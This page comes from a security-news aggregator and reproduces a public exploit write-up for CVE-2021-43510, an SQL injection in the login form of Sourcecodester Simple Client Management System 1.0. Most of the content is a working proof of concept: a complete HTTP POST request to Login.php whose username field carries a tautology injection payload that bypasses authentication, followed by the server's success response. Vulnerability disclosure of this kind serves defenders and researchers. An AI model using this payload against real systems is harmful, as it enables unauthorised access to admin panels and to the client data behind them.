Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2021-43510: Simple-Client-Management-System-Exploit/CVE-2021-43510 at main · r4hn1/Simple-Client-Management-System-Exploit

SQL Injection vulnerability exists in Sourcecodester Simple Client Management System 1.0 via the username field in login.php.

CVE
#sql#vulnerability#web#windows#apple#debian#apache

Permalink

Cannot retrieve contributors at this time

# Exploit Title: Simple Client Management System 1.0 - SQL injection (Authentication Bypass)

# Date: 27/01/2022

# Exploit Author: Rahul Kalnarayan (r4hn1)

# Vendor Homepage: https://www.sourcecodester.com/

# Software Link: https://www.sourcecodester.com/php/15027/simple-client-management-system-php-source-code.html

# Version: 1.0

# Category: Webapps

# Tested on: Apache2+MariaDB latest version

# Description : Simple Client Management System 1.0 suffers from SQL injection vulnerability, allowing an un-authenticated user to login admin panel.

# CVE ID: CVE-2021-43510

Vulnerable Page: /crm/admin/

POC-Request

-----------------------------------

POST /cms/classes/Login.php?f=login HTTP/1.1

Host: 192.168.1.76

Content-Length: 31

Accept: */*

X-Requested-With: XMLHttpRequest

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

Origin: http://192.168.1.76

Referer: http://192.168.1.76/cms/admin/login.php

Accept-Encoding: gzip, deflate

Accept-Language: en-US,en;q=0.9

Connection: close

username=admin’+or+’1’%3d’1’–±&password=as

---------------------------------------

POC-Response

HTTP/1.1 200 OK

Date: Thu, 27 Jan 2022 17:29:08 GMT

Server: Apache/2.4.38 (Debian)

Set-Cookie: PHPSESSID=1s27q3saavhi3jc8lndng66tlt; path=/; secure

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate

Pragma: no-cache

Content-Length: 20

Connection: close

Content-Type: text/html; charset=UTF-8

{"status":"success"}

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907